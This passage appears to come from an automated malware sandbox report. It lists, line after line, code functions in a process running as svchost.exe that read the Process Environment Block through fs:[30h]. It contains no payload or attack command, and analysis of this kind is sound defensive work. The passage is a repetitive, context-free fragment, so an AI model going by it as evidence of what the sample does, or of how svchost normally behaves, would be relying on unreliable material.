                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h]2_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
